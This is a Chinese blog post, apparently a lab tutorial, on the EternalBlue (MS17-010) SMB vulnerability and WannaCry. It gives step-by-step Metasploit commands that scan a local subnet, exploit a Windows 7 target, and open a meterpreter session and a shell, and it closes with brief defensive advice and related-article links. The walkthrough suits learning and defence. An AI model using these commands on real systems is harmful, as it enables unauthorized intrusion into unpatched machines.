1.什么是永恒之蓝:

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。                                                                                                                                              ----百度百科

2.复刻:

工具:kali-linux 2022(攻击机)(IP:192.168.0,108)

windows7 X64(靶机)(已经打开445端口)(IP:192.168.0.104)

两系统在同一个网段

方法:

准备:

1.查找使用4444端口的程序

lsof -i:4444

2.杀掉使用4444端口的程序

kill -9 PID

PID就是上面查找到的程序的编号,如果不把进程杀掉,后面会报错

1.加载工具

msfconsole

2.搜索攻击模块

search ms17-010

3.选择攻击模块(这个是搜索的)

use auxiliary/scanner/smb/smb_ms17_010

4.看一下要设置的参数

show options

5.设置IP(就是在这个网段下搜索有漏洞的IP)

set rhosts 192.168.0.1/24

6.设置线程

set threads 50

7.开始搜索

run

8.更换攻击模块

use windows/smb/ms17_010_eternalblue

9.查看要设置的参数

show options

10.设置IP

set rhosts 192.168.0.104(这就是填我们之前搜到的IP)

11.看一下可否攻击

check

12.开始攻击

run

这时候就攻击成功,然后我们就进到了meterpreter

1.屏幕截图

screenshot

2.进入shell

shell

3.更改一下编码,要不然都是乱码

chcp 65001

后面的就简单了。

ms17-010永恒之蓝渗透攻击

防范:1.开启防火墙,关闭445端口

2.安装杀毒软件

3.及时更新windows,微软在2017年发布了ms17-010的补丁

ms17-010永恒之蓝使用和防范(内附视频)相关推荐

  1. “永恒之蓝”第一弹-关于防范感染勒索蠕虫病毒的紧急通知

    北京时间2017年5月12日20时起,一款名为WannaCry/Wcry的勒索蠕虫病毒在全球范围开始传播.感染该病毒后的用户系统重要数据会被***加密,并索取一定价值的比特币后,数据才会被解密. 本文 ...

  2. 《MS17-010(永恒之蓝)—漏洞复现及防范》

    作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一. 什么是永恒之蓝? - 永恒之蓝 永恒之蓝(Eternal Blue)是一种利用Window ...

  3. 永恒之蓝勒索软件病毒防范方法及措施

    目前微软已发布补丁MS17-010修复了"永恒之蓝"***的系统漏洞,请广大师生尽快根据各自操作系统安装补丁,地址:https://technet.microsoft.com/zh ...

  4. 永恒之蓝漏洞分析与防范

    漏洞利用原理 永恒之蓝漏洞的利用原理是通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行.在Windows操作系统中,SMB服务默认是开启的,监听端口默认为4 ...

  5. 永恒之蓝(ms17-010)简介与复现

    一.永恒之蓝的介绍 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  6. 【重要预警】“永恒之蓝”漏洞又现新木马 组成僵尸网络挖矿虚拟货币

    WannaCry和UIWIX勒索软件在全世界掀起了轩然大波,但是利用"永恒之蓝"漏洞进行攻击的却不止这两个恶意软件.今日,亚信安全中国病毒响应中心发现了利用"永恒之蓝&q ...

  7. MS17-010 “永恒之蓝“ 修复方案

    一.预防 1.为计算机安装最新的安全补丁,微软已发布补丁MS17-010修复了"永恒之蓝"攻击的系统漏洞,请尽快安装此安全补丁,网址为Microsoft 安全公告 MS17-010 ...

  8. 勒索病毒WannaCry(永恒之蓝)

    原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 .作者信息和本声明.否则将追究法律责任.http://solin.blog.51cto.com/11319413/1925890 勒索病 ...

  9. 别让虚拟化成为“永恒之蓝”的下一个攻击目标

    2017年5月12日起,"永恒之蓝"勒索蠕虫利用微软系统漏洞横扫全球,目标直指没有及时更新系统补丁的Windows系统,被感染用户必须缴纳赎金才能恢复被不法分子加密的文档被加密.作 ...

  10. 永恒之蓝黑脏牛提权范围

    SMBv1协议 MS17-010 --永恒之蓝漏洞 影响范围:Windows Vista.Win7.Win8.Win XP.Windows server 2003等. 防范措施:及时更新Windows ...

最新文章

  1. 第1章 Java语言概述
  2. tp5循环查询语句_tp5 foreach 套循环的优化(就是foreach 里边再查表)
  3. 电脑登陆不了网页的服务器地址,电脑登陆qq打不开网页怎么设置
  4. Elasticsearch DSL
  5. MongoDB与MySQL效率对比
  6. C++作用域、局部变量、全局变量、传引用传值对比的一个例子
  7. 使用C#开发ActiveX控件
  8. [CF321E] Ciel and Gondolas
  9. 181117每日一句
  10. 廖雪峰git教程总结
  11. Tomcat6配置参数详解
  12. 扫码枪WinForm程序的编写
  13. unity webgl 手机端微信直接打开链接
  14. 使用css样式做出亚克力背景和透明背景
  15. oracle exp 排除某些表导出其他表
  16. csgo服务器显示指令,CSGO国服控制台怎么打开 CSGO国服指令代码大全
  17. poky linux初探 -- 添加自己的内核食谱
  18. c语言中f1是什么意思啊,F1知识科普,这些字母代表什么你知道吗?
  19. leetcode|剑指offter|面试题3:数组中重复的数字
  20. 概率质量函数(Probability mass function)

热门文章

  1. 如何按要求批量修改Excel工作表名称
  2. 海信智能电视如何看电视直播
  3. jQuery大法第五式--动画效果
  4. 打印机驱动如何连接计算机,打印机与电脑第一次连接驱动怎么操作
  5. vscode插件快餐教程(3) - Diagnostic
  6. 东子破解的java设计模式状态模式
  7. 阿里云因发现Log4j2漏洞未及时上报,被工信部处罚!
  8. rebase操作使用方法
  9. 阿里云香港服务器带宽太贵怎么办?香港节点全球CDN加速你值得拥有
  10. 在JSP打开EXCEL文件